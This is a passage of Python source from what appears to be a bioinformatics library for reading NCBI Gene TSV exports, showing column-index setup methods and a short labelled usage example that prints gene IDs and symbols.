usr_hdrs = [E[0] for E in self.hdrs_usr] if self.hdrs_usr else self.hdr2idx
self._init_idxs_float(usr_hdrs)
self._init_idxs_int(usr_hdrs)
self._init_idxs_strpat(usr_hdrs)
self.usr_max_idx = max(E[1] for E in self.hdrs_usr) if self.hdrs_usr else len(self.hdr2idx)-1
def _init_idxs_float(self, usr_hdrs):
"""List of indexes whose values will be floats."""
self.idxs_float = [
Idx for Hdr, Idx in self.hdr2idx.items() if Hdr in usr_hdrs and Hdr in self.float_hdrs]
def _init_idxs_int(self, usr_hdrs):
"""List of indexes whose values will be ints."""
self.idxs_int = [
Idx for Hdr, Idx in self.hdr2idx.items() if Hdr in usr_hdrs and Hdr in self.int_hdrs]
def _init_idxs_strpat(self, usr_hdrs):
"""List of indexes whose values will be strings."""
strpat = self.strpat_hdrs.keys()
self.idxs_strpat = [
Idx for Hdr, Idx in self.hdr2idx.items() if Hdr in usr_hdrs and Hdr in strpat]
# Copyright (C) 2016-present, DV Klopfenstein, H Tang, All rights reserved.
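

# ----------------------------------------------------------------------------
# Hedged usage sketch (not part of the original source): one way the reader
# above might be driven. The input file name 'gene_result.txt' and the
# requested column names are assumptions based on the NCBI Gene
# "Send to" -> File export described in the class docstring.
def _demo_ncbi_reader(fin_tsv='gene_result.txt'):
    """Print GeneID and Symbol for the first few genes in an NCBI Gene export."""
    reader = NCBIgeneFileReader(fin_tsv, sep="\t")
    # 'sublist' returns one [GeneID, Symbol] pair per data line; GeneID values
    # are converted to int because 'GeneID' is listed in reader.int_hdrs.
    rows, _ = reader.run('sublist', ['GeneID', 'Symbol'])
    for geneid, symbol in rows[:5]:
        sys.stdout.write('{ID}\t{SYM}\n'.format(ID=geneid, SYM=symbol))

# Example invocation (assumes gene_result.txt was downloaded as described above):
#     _demo_ncbi_reader('gene_result.txt')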